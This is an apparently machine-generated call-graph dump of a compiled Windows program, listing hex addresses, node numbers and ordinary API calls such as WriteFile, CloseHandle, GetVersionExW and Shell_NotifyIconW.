b7debc 105705->105711 105706->105698 105712 b7df6a WriteFile 105706->105712 105707 b7e1b2 105765 b78af4 58 API calls __getptd_noexit 105707->105765 105714 b7dee3 105708->105714 105715 b7e17b 105708->105715 105709->105698 105710 b7e064 WideCharToMultiByte 105709->105710 105710->105696 105724 b7e0ab 105710->105724 105711->105703 105712->105696 105716 b7dfb9 105712->105716 105761 b78b28 58 API calls __getptd_noexit 105714->105761 105763 b78b07 58 API calls 3 library calls 105715->105763 105716->105703 105716->105706 105716->105711 105719 b7e0b3 WriteFile 105722 b7e106 GetLastError 105719->105722 105719->105724 105720 b7dee8 105762 b78af4 58 API calls __getptd_noexit 105720->105762 105722->105724 105724->105703 105724->105709 105724->105711 105724->105719 105725 b862ba 60 API calls __write_nolock 105725->105730 105726 b87a5e WriteConsoleW CreateFileW __putwch_nolock 105729 b7dc5f 105726->105729 105727 b7dbf2 WideCharToMultiByte 105727->105703 105728 b7dc2d WriteFile 105727->105728 105728->105696 105728->105729 105729->105696 105729->105703 105729->105726 105729->105730 105731 b7dc87 WriteFile 105729->105731 105730->105703 105730->105725 105730->105727 105730->105729 105760 b735f5 58 API calls __isleadbyte_l 105730->105760 105731->105696 105731->105729 105732->105639 105733->105654 105734->105642 105735->105656 105736->105655 105737->105654 105738->105642 105739->105650 105740->105654 105741->105665 105742->105661 105744 b85c76 105743->105744 105746 b85c83 105743->105746 105745 b78b28 __wsplitpath_helper 58 API calls 105744->105745 105748 b85c7b 105745->105748 105747 b78b28 __wsplitpath_helper 58 API calls 105746->105747 105749 b85c8f 105746->105749 105750 b85cb0 105747->105750 105748->105687 105749->105687 105751 b78db6 __wsplitpath_helper 9 API calls 105750->105751 105751->105748 105752->105675 105753->105682 105754->105670 105755->105685 105756->105690 105757->105670 105758->105680 105759->105697 105760->105730 105761->105720 105762->105670 105763->105670 105764->105707 105765->105670 105766->105600 105767->105602 105791 b7d4c3 105768->105791 105770 b80b41 105804 b7d43d 59 API calls 2 library calls 105770->105804 105771 b80aeb 105771->105770 105773 b80b1f 105771->105773 105776 b7d4c3 __close_nolock 58 API calls 105771->105776 105773->105770 105774 b7d4c3 __close_nolock 58 API calls 105773->105774 105777 b80b2b CloseHandle 105774->105777 105775 b80b49 105778 b80b6b 105775->105778 105805 b78b07 58 API calls 3 library calls 105775->105805 105779 b80b16 105776->105779 105777->105770 105780 b80b37 GetLastError 105777->105780 105778->105627 105782 b7d4c3 __close_nolock 58 API calls 105779->105782 105780->105770 105782->105773 105783->105611 105784->105625 105785->105614 105786->105627 105787->105625 105788->105614 105789->105620 105790->105625 105792 b7d4e3 105791->105792 105793 b7d4ce 105791->105793 105798 b7d508 105792->105798 105808 b78af4 58 API calls __getptd_noexit 105792->105808 105806 b78af4 58 API calls __getptd_noexit 105793->105806 105795 b7d4d3 105807 b78b28 58 API calls __getptd_noexit 105795->105807 105798->105771 105799 b7d512 105809 b78b28 58 API calls __getptd_noexit 105799->105809 105800 b7d4db 105800->105771 105802 b7d51a 105810 b78db6 9 API calls __wsplitpath_helper 105802->105810 105804->105775 105805->105778 105806->105795 105807->105800 105808->105799 105809->105802 105810->105800 105873 b81940 105811->105873 105814 b5477c 105817 b57bcc 59 API calls 105814->105817 105815 b54799 105879 b57d8c 105815->105879 105818 b54788 105817->105818 105875 b57726 105818->105875 105821 b70791 105822 b81940 __ftell_nolock 105821->105822 105823 b7079e GetLongPathNameW 105822->105823 105824 b57bcc 59 API calls 105823->105824 105825 b572bd 105824->105825 105826 b5700b 105825->105826 105827 b57667 59 API calls 105826->105827 105828 b5701d 105827->105828 105829 b54750 60 API calls 105828->105829 105830 b57028 105829->105830 105831 b57033 105830->105831 105832 b8e885 105830->105832 105834 b53f74 59 API calls 105831->105834 105836 b8e89f 105832->105836 105893 b57908 61 API calls 105832->105893 105835 b5703f 105834->105835 105887 b534c2 105835->105887 105838 b57052 Mailbox 105838->104939 105840 b54ddd 136 API calls 105839->105840 105841 b5688f 105840->105841 105842 b8e031 105841->105842 105844 b54ddd 136 API calls 105841->105844 105843 bb955b 122 API calls 105842->105843 105845 b8e046 105843->105845 105846 b568a3 105844->105846 105847 b8e04a 105845->105847 105848 b8e067 105845->105848 105846->105842 105849 b568ab 105846->105849 105850 b54e4a 84 API calls 105847->105850 105851 b70db6 Mailbox 59 API calls 105848->105851 105852 b568b7 105849->105852 105853 b8e052 105849->105853 105850->105853 105857 b8e0ac Mailbox 105851->105857 105894 b56a8c 105852->105894 106000 bb42f8 90 API calls _wprintf 105853->106000 105856 b8e060 105856->105848 105859 b8e260 105857->105859 105863 b8e271 105857->105863 105870 b57de1 59 API calls 105857->105870 105986 b5750f 105857->105986 105994 b5735d 105857->105994 106001 baf73d 59 API calls 2 library calls 105857->106001 106002 baf65e 61 API calls 2 library calls 105857->106002 106003 bb737f 59 API calls Mailbox 105857->106003 105860 b72d55 _free 58 API calls 105859->105860 105861 b8e268 105860->105861 105862 b54e4a 84 API calls 105861->105862 105862->105863 105867 b72d55 _free 58 API calls 105863->105867 105869 b54e4a 84 API calls 105863->105869 106004 baf7a1 89 API calls 4 library calls 105863->106004 105867->105863 105869->105863 105870->105857 105874 b5475d GetFullPathNameW 105873->105874 105874->105814 105874->105815 105876 b57734 105875->105876 105883 b57d2c 105876->105883 105878 b54794 105878->105821 105880 b57da6 105879->105880 105882 b57d99 105879->105882 105881 b70db6 Mailbox 59 API calls 105880->105881 105881->105882 105882->105818 105884 b57d3a 105883->105884 105886 b57d43 _memmove 105883->105886 105885 b57e4f 59 API calls 105884->105885 105884->105886 105885->105886 105886->105878 105888 b534d4 105887->105888 105892 b534f3 _memmove 105887->105892 105890 b70db6 Mailbox 59 API calls 105888->105890 105889 b70db6 Mailbox 59 API calls 105891 b5350a 105889->105891 105890->105892 105891->105838 105892->105889 105893->105832 105895 b56ab5 105894->105895 105896 b8e41e 105894->105896 106010 b557a6 60 API calls Mailbox 105895->106010 106077 baf7a1 89 API calls 4 library calls 105896->106077 105899 b56ad7 106011 b557f6 67 API calls 105899->106011 105900 b8e431 106078 baf7a1 89 API calls 4 library calls 105900->106078 105902 b56aec 105902->105900 105904 b56af4 105902->105904 105906 b57667 59 API calls 105904->105906 105905 b8e44d 105908 b56b61 105905->105908 105907 b56b00 105906->105907 106012 b70957 60 API calls __ftell_nolock 105907->106012 105910 b8e460 105908->105910 105911 b56b6f 105908->105911 105913 b55c6f CloseHandle 105910->105913 105914 b57667 59 API calls 105911->105914 105912 b56b0c 105915 b57667 59 API calls 105912->105915 105917 b8e46c 105913->105917 105918 b56b78 105914->105918 105916 b56b18 105915->105916 105919 b54750 60 API calls 105916->105919 105920 b54ddd 136 API calls 105917->105920 105921 b57667 59 API calls 105918->105921 105922 b56b26 105919->105922 105923 b8e488 105920->105923 105924 b56b81 105921->105924 106013 b55850 ReadFile SetFilePointerEx 105922->106013 105926 b8e4b1 105923->105926 105929 bb955b 122 API calls 105923->105929 106015 b5459b 105924->106015 106079 baf7a1 89 API calls 4 library calls 105926->106079 105928 b56b52 106014 b55aee SetFilePointerEx SetFilePointerEx 105928->106014 105933 b8e4a4 105929->105933 105930 b56b98 105934 b57b2e 59 API calls 105930->105934 105935 b8e4ac 105933->105935 105936 b8e4cd 105933->105936 105937 b56ba9 SetCurrentDirectoryW 105934->105937 105939 b54e4a 84 API calls 105935->105939 105938 b54e4a 84 API calls 105936->105938 105941 b56bbc Mailbox 105937->105941 105940 b8e4d2 105938->105940 105939->105926 105942 b70db6 Mailbox 59 API calls 105940->105942 105944 b70db6 Mailbox 59 API calls 105941->105944 105948 b8e506 105942->105948 105946 b56bcf 105944->105946 105945 b53bbb 105945->104806 105945->104828 105947 b5522e 59 API calls 105946->105947 105975 b56bda Mailbox __wsetenvp 105947->105975 105949 b5750f 59 API calls 105948->105949 105983 b8e54f Mailbox 105949->105983 105950 b56ce7 106073 b55c6f 105950->106073 105953 b8e740 106084 bb72df 59 API calls Mailbox 105953->106084 105954 b56cf3 SetCurrentDirectoryW 105967 b56d0c Mailbox 105954->105967 105957 b8e762 106085 bcfbce 59 API calls 2 library calls 105957->106085 105960 b8e76f 105962 b72d55 _free 58 API calls 105960->105962 105961 b8e7d9 106088 baf7a1 89 API calls 4 library calls 105961->106088 105962->105967 105965 b5750f 59 API calls 105965->105983 105966 b8e7f2 105966->105950 106005 b557d4 105967->106005 105969 b8e7d1 106087 baf5f7 59 API calls 4 library calls 105969->106087 105972 b57de1 59 API calls 105972->105975 105975->105950 105975->105961 105975->105969 105975->105972 106066 b5586d 67 API calls _wcscpy 105975->106066 106067 b56f5d GetStringTypeW 105975->106067 106068 b56ecc 60 API calls __wcsnicmp 105975->106068 106069 b56faa GetStringTypeW __wsetenvp 105975->106069 106070 b7363d GetStringTypeW _iswctype 105975->106070 106071 b568dc 165 API calls 3 library calls 105975->106071 106072 b57213 59 API calls Mailbox 105975->106072 105976 b57de1 59 API calls 105976->105983 105980 b8e792 106086 baf7a1 89 API calls 4 library calls 105980->106086 105982 b8e7ab 105984 b72d55 _free 58 API calls 105982->105984 105983->105953 105983->105965 105983->105976 105983->105980 106080 baf73d 59 API calls 2 library calls 105983->106080 106081 baf65e 61 API calls 2 library calls 105983->106081 106082 bb737f 59 API calls Mailbox 105983->106082 106083 b57213 59 API calls Mailbox 105983->106083 105985 b8e4c8 105984->105985 105985->105967 105987 b575af 105986->105987 105990 b57522 _memmove 105986->105990 105989 b70db6 Mailbox 59 API calls 105987->105989 105988 b70db6 Mailbox 59 API calls 105991 b57529 105988->105991 105989->105990 105990->105988 105992 b70db6 Mailbox 59 API calls 105991->105992 105993 b57552 105991->105993 105992->105993 105993->105857 105995 b57370 105994->105995 105997 b5741e 105994->105997 105996 b70db6 Mailbox 59 API calls 105995->105996 105999 b573a2 105995->105999 105996->105999 105997->105857 105998 b70db6 59 API calls Mailbox 105998->105999 105999->105997 105999->105998 106000->105856 106001->105857 106002->105857 106003->105857 106004->105863 106006 b55c6f CloseHandle 106005->106006 106007 b557dc Mailbox 106006->106007 106008 b55c6f CloseHandle 106007->106008 106009 b557eb 106008->106009 106009->105945 106010->105899 106011->105902 106012->105912 106013->105928 106014->105908 106016 b57667 59 API calls 106015->106016 106017 b545b1 106016->106017 106018 b57667 59 API calls 106017->106018 106019 b545b9 106018->106019 106020 b57667 59 API calls 106019->106020 106021 b545c1 106020->106021 106022 b57667 59 API calls 106021->106022 106023 b545c9 106022->106023 106024 b545fd 106023->106024 106025 b8d4d2 106023->106025 106026 b5784b 59 API calls 106024->106026 106027 b58047 59 API calls 106025->106027 106028 b5460b 106026->106028 106029 b8d4db 106027->106029 106030 b57d2c 59 API calls 106028->106030 106031 b57d8c 59 API calls 106029->106031 106032 b54615 106030->106032 106034 b54640 106031->106034 106033 b5784b 59 API calls 106032->106033 106032->106034 106037 b54636 106033->106037 106035 b54680 106034->106035 106038 b5465f 106034->106038 106048 b8d4fb 106034->106048 106089 b5784b 106035->106089 106040 b57d2c 59 API calls 106037->106040 106042 b579f2 59 API calls 106038->106042 106039 b54691 106043 b546a3 106039->106043 106046 b58047 59 API calls 106039->106046 106040->106034 106041 b8d5cb 106044 b57bcc 59 API calls 106041->106044 106045 b54669 106042->106045 106047 b546b3 106043->106047 106049 b58047 59 API calls 106043->106049 106056 b8d588 106044->106056 106045->106035 106052 b5784b 59 API calls 106045->106052 106046->106043 106051 b546ba 106047->106051 106053 b58047 59 API calls 106047->106053 106048->106041 106050 b8d5b4 106048->106050 106063 b8d532 106048->106063 106049->106047 106050->106041 106058 b8d59f 106050->106058 106054 b546c1 Mailbox 106051->106054 106055 b58047 59 API calls 106051->106055 106052->106035 106053->106051 106054->105930 106055->106054 106056->106035 106057 b579f2 59 API calls 106056->106057 106102 b57924 59 API calls 2 library calls 106056->106102 106057->106056 106060 b57bcc 59 API calls 106058->106060 106059 b8d590 106061 b57bcc 59 API calls 106059->106061 106060->106056 106061->106056 106063->106059 106064 b8d57b 106063->106064 106065 b57bcc 59 API calls 106064->106065 106065->106056 106066->105975 106067->105975 106068->105975 106069->105975 106070->105975 106071->105975 106072->105975 106074 b55c79 106073->106074 106075 b55c88 106073->106075 106074->105954 106075->106074 106076 b55c8d CloseHandle 106075->106076 106076->106074 106077->105900 106078->105905 106079->105985 106080->105983 106081->105983 106082->105983 106083->105983 106084->105957 106085->105960 106086->105982 106087->105961 106088->105966 106090 b578b7 106089->106090 106091 b5785a 106089->106091 106092 b57d2c 59 API calls 106090->106092 106091->106090 106093 b57865 106091->106093 106098 b57888 _memmove 106092->106098 106094 b8eb09 106093->106094 106095 b57880 106093->106095 106104 b58029 106094->106104 106103 b57f27 59 API calls Mailbox 106095->106103 106098->106039 106099 b8eb13 106100 b70db6 Mailbox 59 API calls 106099->106100 106101 b8eb33 106100->106101 106102->106056 106103->106098 106105 b70db6 Mailbox 59 API calls 106104->106105 106106 b58033 106105->106106 106106->106099 106107->104950 106109 b56d95 106108->106109 106115 b56ea9 106108->106115 106110 b70db6 Mailbox 59 API calls 106109->106110 106109->106115 106112 b56dbc 106110->106112 106111 b70db6 Mailbox 59 API calls 106113 b56e31 106111->106113 106112->106111 106113->106115 106117 b5735d 59 API calls 106113->106117 106118 b5750f 59 API calls 106113->106118 106121 b56240 106113->106121 106146 ba6553 59 API calls Mailbox 106113->106146 106115->104954 106117->106113 106118->106113 106119->104956 106120->104958 106147 b57a16 106121->106147 106123 b5646a 106124 b5750f 59 API calls 106123->106124 106125 b56484 Mailbox 106124->106125 106125->106113 106128 b8dff6 106156 baf8aa 91 API calls 4 library calls 106128->106156 106129 b57d8c 59 API calls 106140 b56265 106129->106140 106130 b5750f 59 API calls 106130->106140 106134 b8e004 106135 b5750f 59 API calls 106134->106135 106136 b8e01a 106135->106136 106136->106125 106137 b56799 _memmove 106157 baf8aa 91 API calls 4 library calls 106137->106157 106138 b8df92 106139 b58029 59 API calls 106138->106139 106141 b8df9d 106139->106141 106140->106123 106140->106128 106140->106129 106140->106130 106140->106137 106140->106138 106143 b57e4f 59 API calls 106140->106143 106152 b55f6c 60 API calls 106140->106152 106153 b55d41 59 API calls Mailbox 106140->106153 106154 b55e72 60 API calls 106140->106154 106155 b57924 59 API calls 2 library calls 106140->106155 106145 b70db6 Mailbox 59 API calls 106141->106145 106144 b5643b CharUpperBuffW 106143->106144 106144->106140 106145->106137 106146->106113 106148 b70db6 Mailbox 59 API calls 106147->106148 106149 b57a3b 106148->106149 106150 b58029 59 API calls 106149->106150 106151 b57a4a 106150->106151 106151->106140 106152->106140 106153->106140 106154->106140 106155->106140 106156->106134 106157->106125 106158->104972 106159->104973 106161 b54196 106160->106161 106162 b8d423 106160->106162 106161->104979 106186 bb2f94 62 API calls _W_store_winword 106161->106186 106162->106161 106163 b8d42c DestroyIcon 106162->106163 106163->106161 106165 b5416f Mailbox 106164->106165 106166 b54098 106164->106166 106165->104985 106167 b57a16 59 API calls 106166->106167 106168 b540a6 106167->106168 106169 b8d3c8 LoadStringW 106168->106169 106170 b540b3 106168->106170 106172 b8d3e2 106169->106172 106171 b57bcc 59 API calls 106170->106171 106173 b540c8 106171->106173 106174 b57b2e 59 API calls 106172->106174 106173->106172 106175 b540d9 106173->106175 106180 b8d3ec 106174->106180 106176 b54174 106175->106176 106177 b540e3 106175->106177 106179 b58047 59 API calls 106176->106179 106178 b57b2e 59 API calls 106177->106178 106182 b540ed _memset _wcscpy 106178->106182 106179->106182 106181 b57cab 59 API calls 106180->106181 106180->106182 106183 b8d40e 106181->106183 106184 b54155 Shell_NotifyIconW 106182->106184 106185 b57cab 59 API calls 106183->106185 106184->106165 106185->106182 106186->104979 106188 b5e6d5 106187->106188 106189 b93aa9 106188->106189 106192 b5e73f 106188->106192 106201 b5e799 106188->106201 106277 b59ea0 106189->106277 106191 b93abe 106205 b5e970 Mailbox 106191->106205 106301 bb9e4a 89 API calls 4 library calls 106191->106301 106195 b57667 59 API calls 106192->106195 106192->106201 106193 b57667 59 API calls 106193->106201 106196 b93b04 106195->106196 106198 b72d40 __cinit 67 API calls 106196->106198 106197 b72d40 __cinit 67 API calls 106197->106201 106198->106201 106199 b93b26 106199->105062 106200 b584c0 69 API calls 106200->106205 106201->106193 106201->106197 106201->106199 106202 b5e95a 106201->106202 106201->106205 106202->106205 106302 bb9e4a 89 API calls 4 library calls 106202->106302 106203 b59ea0 331 API calls 106203->106205 106205->106200 106205->106203 106208 bb9e4a 89 API calls 106205->106208 106211 b58d40 59 API calls 106205->106211 106214 b5f195 106205->106214 106217 b5ea78 106205->106217 106276 b57f77 59 API calls 2 library calls 106205->106276 106303 ba6e8f 59 API calls 106205->106303 106304 bcc5c3 331 API calls 106205->106304 106305 bcb53c 331 API calls Mailbox 106205->106305 106307 b59c90 59 API calls Mailbox 106205->106307 106308 bc93c6 331 API calls Mailbox 106205->106308 106208->106205 106211->106205 106306 bb9e4a 89 API calls 4 library calls 106214->106306 106216 b93e25 106216->105062 106217->105062 106219 b5f650 106218->106219 106220 b5f4ba 106218->106220 106223 b57de1 59 API calls 106219->106223 106221 b5f4c6 106220->106221 106222 b9441e 106220->106222 106315 b5f290 106221->106315 106423 bcbc6b 331 API calls Mailbox 106222->106423 106229 b5f58c Mailbox 106223->106229 106226 b9442c 106230 b5f630 106226->106230 106424 bb9e4a 89 API calls 4 library calls 106226->106424 106228 b5f4fd 106228->106226 106228->106229 106228->106230 106330 bbcb7a 106229->106330 106410 bc445a 106229->106410 106419 bb3c37 106229->106419 106230->105062 106232 b5f5e3 106232->106230 106422 b59c90 59 API calls Mailbox 106232->106422 106236->105062 106237->105062 106238->105062 106239->104992 106240->104997 106241->105062 106242->104999 106243->104999 106244->104999 106245->105062 106246->105062 106247->105062 106249 b59851 106248->106249 106258 b5984b 106248->106258 106250 b59899 106249->106250 106251 b59857 __itow 106249->106251 106252 b8f5d3 __i64tow 106249->106252 106257 b8f4da 106249->106257 106586 b73698 83 API calls 3 library calls 106250->106586 106255 b70db6 Mailbox 59 API calls 106251->106255 106256 b59871 106255->106256 106256->106258 106260 b57de1 59 API calls 106256->106260 106259 b70db6 Mailbox 59 API calls 106257->106259 106264 b8f552 Mailbox _wcscpy 106257->106264 106258->105062 106261 b8f51f 106259->106261 106260->106258 106262 b70db6 Mailbox 59 API calls 106261->106262 106263 b8f545 106262->106263 106263->106264 106265 b57de1 59 API calls 106263->106265 106587 b73698 83 API calls 3 library calls 106264->106587 106265->106264 106266->105062 106267->105062 106268->105062 106269->105045 106270->105045 106271->105045 106272->105045 106273->105045 106274->105045 106275->105045 106276->106205 106278 b59ebf 106277->106278 106297 b59eed Mailbox 106277->106297 106279 b70db6 Mailbox 59 API calls 106278->106279 106279->106297 106280 b5b475 106281 b58047 59 API calls 106280->106281 106290 b5a057 106281->106290 106282 b5b47a 106284 b909e5 106282->106284 106285 b90055 106282->106285 106283 b70db6 59 API calls Mailbox 106283->106297 106314 bb9e4a 89 API calls 4 library calls 106284->106314 106311 bb9e4a 89 API calls 4 library calls 106285->106311 106288 b5a55a 106312 bb9e4a 89 API calls 4 library calls 106288->106312 106290->106191 106291 b90064 106291->106191 106294 b58047 59 API calls 106294->106297 106295 b57667 59 API calls 106295->106297 106296 ba6e8f 59 API calls 106296->106297 106297->106280 106297->106282 106297->106283 106297->106285 106297->106288 106297->106290 106297->106294 106297->106295 106297->106296 106298 b72d40 67 API calls __cinit 106297->106298 106299 b909d6 106297->106299 106309 b5c8c0 331 API calls 2 library calls 106297->106309 106310 b5b900 60 API calls Mailbox 106297->106310 106298->106297 106313 bb9e4a 89 API calls 4 library calls 106299->106313 106301->106205 106302->106205 106303->106205 106304->106205 106305->106205 106306->106216 106307->106205 106308->106205 106309->106297 106310->106297 106311->106291 106312->106290 106313->106284 106314->106290 106316 b5f43a 106315->106316 106318 b5f2bc 106315->106318 106426 bb9e4a 89 API calls 4 library calls 106316->106426 106318->106316 106320 b5f2f9 _memmove 106318->106320 106319 b943a9 106319->106228 106320->106319 106323 b70db6 59 API calls Mailbox 106320->106323 106324 b943f9 106320->106324 106326 b59ea0 331 API calls 106320->106326 106327 b943ab 106320->106327 106329 b5f3d3 106320->106329 106321 b5f3e3 106321->106228 106323->106320 106428 b5f6a3 331 API calls 106324->106428 106326->106320 106427 bb9e4a 89 API calls 4 library calls 106327->106427 106329->106321 106425 bca2d9 85 API calls Mailbox 106329->106425 106331 b57667 59 API calls 106330->106331 106332 bbcbaf 106331->106332 106333 b57667 59 API calls 106332->106333 106334 bbcbb8 106333->106334 106335 bbcbcc 106334->106335 106538 b59b3c 59 API calls 106334->106538 106337 b59837 84 API calls 106335->106337 106338 bbcbe9 106337->106338 106339 bbcc0b 106338->106339 106340 bbccea 106338->106340 106345 bbcd1a Mailbox 106338->106345 106341 b59837 84 API calls 106339->106341 106342 b54ddd 136 API calls 106340->106342 106343 bbcc17 106341->106343 106344 bbccfe 106342->106344 106346 b58047 59 API calls 106343->106346 106347 bbcd16 106344->106347 106349 b54ddd 136 API calls 106344->106349 106345->106232 106348 bbcc23 106346->106348 106347->106345 106350 b57667 59 API calls 106347->106350 106354 bbcc69 106348->106354 106355 bbcc37 106348->106355 106349->106347 106351 bbcd4b 106350->106351 106352 b57667 59 API calls 106351->106352 106353 bbcd54 106352->106353 106357 b57667 59 API calls 106353->106357 106356 b59837 84 API calls 106354->106356 106358 b58047 59 API calls 106355->106358 106359 bbcc76 106356->106359 106360 bbcd5d 106357->106360 106361 bbcc47 106358->106361 106362 b58047 59 API calls 106359->106362 106363 b57667 59 API calls 106360->106363 106364 b57cab 59 API calls 106361->106364 106365 bbcc82 106362->106365 106366 bbcd66 106363->106366 106367 bbcc51 106364->106367 106539 bb4a31 GetFileAttributesW 106365->106539 106369 b59837 84 API calls 106366->106369 106370 b59837 84 API calls 106367->106370 106372 bbcd73 106369->106372 106373 bbcc5d 106370->106373 106371 bbcc8b 106374 bbcc9e 106371->106374 106377 b579f2 59 API calls 106371->106377 106375 b5459b 59 API calls 106372->106375 106376 b57b2e 59 API calls 106373->106376 106379 b59837 84 API calls 106374->106379 106384 bbcca4 106374->106384 106378 bbcd8e 106375->106378 106376->106354 106377->106374 106380 b579f2 59 API calls 106378->106380 106381 bbcccb 106379->106381 106382 bbcd9d 106380->106382 106540 bb37ef 75 API calls Mailbox 106381->106540 106385 bbcdd1 106382->106385 106387 b579f2 59 API calls 106382->106387 106384->106345 106386 b58047 59 API calls 106385->106386 106388 bbcddf 106386->106388 106389 bbcdae 106387->106389 106390 b57b2e 59 API calls 106388->106390 106389->106385 106391 b57bcc 59 API calls 106389->106391 106392 bbcded 106390->106392 106393 bbcdc3 106391->106393 106394 b57b2e 59 API calls 106392->106394 106395 b57bcc 59 API calls 106393->106395 106396 bbcdfb 106394->106396 106395->106385 106397 b57b2e 59 API calls 106396->106397 106398 bbce09 106397->106398 106399 b59837 84 API calls 106398->106399 106400 bbce15 106399->106400 106429 bb4071 106400->106429 106402 bbce26 106403 bb3c37 3 API calls 106402->106403 106404 bbce30 106403->106404 106405 b59837 84 API calls 106404->106405 106409 bbce61 106404->106409 106406 bbce4e 106405->106406 106483 bb9155 106406->106483 106408 b54e4a 84 API calls 106408->106345 106409->106408 106411 b59837 84 API calls 106410->106411 106412 bc4494 106411->106412 106413 b56240 94 API calls 106412->106413 106414 bc44a4 106413->106414 106415 b59ea0 331 API calls 106414->106415 106416 bc44c9 106414->106416 106415->106416 106418 bc44cd 106416->106418 106581 b59a98 59 API calls Mailbox 106416->106581 106418->106232 106582 bb445a GetFileAttributesW 106419->106582 106422->106232 106423->106226 106424->106230 106425->106321 106426->106319 106427->106319 106428->106319 106430 bb408d 106429->106430 106431 bb4092 106430->106431 106432 bb40a0 106430->106432 106433 b58047 59 API calls 106431->106433 106434 b57667 59 API calls 106432->106434 106435 bb409b Mailbox 106433->106435 106436 bb40a8 106434->106436 106435->106402 106437 b57667 59 API calls 106436->106437 106438 bb40b0 106437->106438 106439 b57667 59 API calls 106438->106439 106440 bb40bb 106439->106440 106441 b57667 59 API calls 106440->106441 106442 bb40c3 106441->106442 106443 b57667 59 API calls 106442->106443 106444 bb40cb 106443->106444 106445 b57667 59 API calls 106444->106445 106446 bb40d3 106445->106446 106447 b57667 59 API calls 106446->106447 106448 bb40db 106447->106448 106449 b57667 59 API calls 106448->106449 106450 bb40e3 106449->106450 106451 b5459b 59 API calls 106450->106451 106452 bb40fa 106451->106452 106453 b5459b 59 API calls 106452->106453 106484 bb9162 __ftell_nolock 106483->106484 106485 b70db6 Mailbox 59 API calls 106484->106485 106486 bb91bf 106485->106486 106487 b5522e 59 API calls 106486->106487 106488 bb91c9 106487->106488 106489 bb8f5f GetSystemTimeAsFileTime 106488->106489 106490 bb91d4 106489->106490 106491 b54ee5 85 API calls 106490->106491 106492 bb91e7 _wcscmp 106491->106492 106493 bb920b 106492->106493 106494 bb92b8 106492->106494 106538->106335 106539->106371 106540->106384 106581->106418 106583 bb3c3e 106582->106583 106584 bb4475 FindFirstFileW 106582->106584 106583->106232 106584->106583 106585 bb448a FindClose 106584->106585 106585->106583 106586->106251 106587->106252 106589 b57c5f __wsetenvp 106588->106589 106590 b58029 59 API calls 106589->106590 106591 b57c70 _memmove 106589->106591 106592 b8ed07 _memmove 106590->106592 106591->105082 106594 b57a5f 106593->106594 106595 b57a85 _memmove 106593->106595 106594->106595 106596 b70db6 Mailbox 59 API calls 106594->106596 106595->105089 106597 b57ad4 106596->106597 106598 b70db6 Mailbox 59 API calls 106597->106598 106598->106595 106599->105090 106600 b51016 106605 b54974 106600->106605 106603 b72d40 __cinit 67 API calls 106604 b51025 106603->106604 106606 b70db6 Mailbox 59 API calls 106605->106606 106607 b5497c 106606->106607 106608 b5101b 106607->106608 106612 b54936 106607->106612 106608->106603 106613 b54951 106612->106613 106614 b5493f 106612->106614 106616 b549a0 106613->106616 106615 b72d40 __cinit 67 API calls 106614->106615 106615->106613 106617 b57667 59 API calls 106616->106617 106618 b549b8 GetVersionExW 106617->106618 106619 b57bcc 59 API calls 106618->106619 106620 b549fb 106619->106620 106621 b57d2c 59 API calls 106620->106621 106630 b54a28 106620->106630 106622 b54a1c 106621->106622 106623 b57726 59 API calls 106622->106623 106623->106630 106624 b54a93 GetCurrentProcess IsWow64Process 106625 b54aac 106624->106625 106627 b54ac2 106625->106627 106628 b54b2b GetSystemInfo 106625->106628 106626 b8d864 106640 b54b37 106627->106640 106629 b54af8 106628->106629 106629->106608 106630->106624 106630->106626 106633 b54ad4 106636 b54b37 2 API calls 106633->106636 106634 b54b1f GetSystemInfo 106635 b54ae9 106634->106635 106635->106629 106638 b54aef FreeLibrary 106635->106638 106637 b54adc GetNativeSystemInfo 106636->106637 106637->106635 106638->106629 106641 b54ad0 106640->106641 106642 b54b40 LoadLibraryA 106640->106642 106641->106633 106641->106634 106642->106641 106643 b54b51 GetProcAddress 106642->106643 106643->106641 106644 b51066 106649 b5f76f 106644->106649 106646 b5106c 106647 b72d40 __cinit 67 API calls 106646->106647 106648 b51076 106647->106648 106650 b5f790 106649->106650 106682 b6ff03 106650->106682 106654 b5f7d7 106655 b57667 59 API calls 106654->106655 106656 b5f7e1 106655->106656 106657 b57667 59 API calls 106656->106657 106658 b5f7eb 106657->106658 106659 b57667 59 API calls 106658->106659 106660 b5f7f5 106659->106660 106661 b57667 59 API calls 106660->106661 106662 b5f833 106661->106662 106663 b57667 59 API calls 106662->106663 106664 b5f8fe 106663->106664 106692 b65f87 106664->106692 106668 b5f930 106669 b57667 59 API calls 106668->106669 106670 b5f93a 106669->106670 106720 b6fd9e 106670->106720 106672 b5f981 106673 b5f991 GetStdHandle 106672->106673 106674 b945ab 106673->106674 106675 b5f9dd 106673->106675 106674->106675 106677 b945b4 106674->106677 106676 b5f9e5 OleInitialize 106675->106676 106676->106646 106727 bb6b38 64 API calls Mailbox 106677->106727 106679 b945bb 106728 bb7207 CreateThread 106679->106728 106681 b945c7 CloseHandle 106681->106676 106729 b6ffdc 106682->106729 106685 b6ffdc 59 API calls 106686 b6ff45 106685->106686 106687 b57667 59 API calls 106686->106687 106688 b6ff51 106687->106688 106689 b57bcc 59 API calls 106688->106689 106690 b5f796 106689->106690 106691 b70162 6 API calls 106690->106691 106691->106654 106693 b57667 59 API calls 106692->106693 106694 b65f97 106693->106694 106695 b57667 59 API calls 106694->106695 106696 b65f9f 106695->106696 106736 b65a9d 106696->106736 106699 b65a9d 59 API calls 106700 b65faf 106699->106700 106701 b57667 59 API calls 106700->106701 106702 b65fba 106701->106702 106703 b70db6 Mailbox 59 API calls 106702->106703 106704 b5f908 106703->106704 106705 b660f9 106704->106705 106706 b66107 106705->106706 106707 b57667 59 API calls 106706->106707 106708 b66112 106707->106708 106709 b57667 59 API calls 106708->106709 106710 b6611d 106709->106710 106711 b57667 59 API calls 106710->106711 106712 b66128 106711->106712 106713 b57667 59 API calls 106712->106713 106714 b66133 106713->106714 106715 b65a9d 59 API calls 106714->106715 106716 b6613e 106715->106716 106717 b70db6 Mailbox 59 API calls 106716->106717 106718 b66145 RegisterWindowMessageW 106717->106718 106718->106668 106721 ba576f 106720->106721 106722 b6fdae 106720->106722 106739 bb9ae7 60 API calls 106721->106739 106724 b70db6 Mailbox 59 API calls 106722->106724 106726 b6fdb6 106724->106726 106725 ba577a 106726->106672 106727->106679 106728->106681 106740 bb71ed 65 API calls 106728->106740 106730 b57667 59 API calls 106729->106730 106731 b6ffe7 106730->106731 106732 b57667 59 API calls 106731->106732 106733 b6ffef 106732->106733 106734 b57667 59 API calls 106733->106734 106735 b6ff3b 106734->106735 106735->106685 106737 b57667 59 API calls 106736->106737 106738 b65aa5 106737->106738 106738->106699 106739->106725 106741 b8fdfc 106745 b5ab30 Mailbox _memmove 106741->106745 106746 b5b525 106745->106746 106765 b57de1 59 API calls 